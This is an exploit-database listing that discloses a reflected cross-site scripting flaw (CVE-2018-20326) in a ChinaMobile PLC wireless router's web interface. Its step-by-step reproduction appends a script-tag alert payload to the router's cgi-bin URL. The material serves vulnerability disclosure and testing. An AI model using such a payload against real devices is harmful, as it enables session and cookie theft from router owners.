[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PLC Wireless Router GPN2.4P21-C-CN Cross Site Scripting Vulnerability

Author
Kumar Saurav
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-31860
Category
web applications
Date add
27-12-2018
CVE
CVE-2018-20326
Platform
cgi
# Exploit Title: PLC Wireless Router GPN2.4P21-C-CN -Reflected XSS 
# Exploit Author: Kumar Saurav
# Vendor: ChinaMobile
# Category: Hardware
# Version: GPN2.4P21-C-CN (Firmware: W2001EN-00)
# Tested on: Multiple
# CVE : CVE-2018-20326

#Description: PLC Wireless Router's are vulnerable to a Reflected Cross Site Scripting (XSS).With this attack, the threat actor can steal cookies, session id, username or other sensitive information redirect an innocent victim to a malicious website, thus compromising the user. 

Reproduction Steps:
Step 1: Go to Wi-fi Router Gateway (192.168.59.254 in my case)
Step 2: Login as Username and Password
Step 3: After Login below url will be shown 
        (http://192.168.59.254/cgi-bin/webprocgetpage=html/index.html&errorpage=html/main.html&var:language=en_us&var:menu=setup&var:page=connected&var:subpage=-)
Step 4: Insert the payload "<script>alert("XSS-Saurav")</script>" at the end of the above mentinoed url and hit enter
          (http://192.168.59.254/cgi-bin/webprocgetpage=html/index.html&errorpage=html/main.html&var:language=en_us&var:menu=setup&var:page=connected&var:subpage=-<script>alert("XSS-Saurav")</script>)
Step 5: On execution of the payload, it will be popped up  as "XSS-Saurav"

#  0day.today [2024-11-16]  #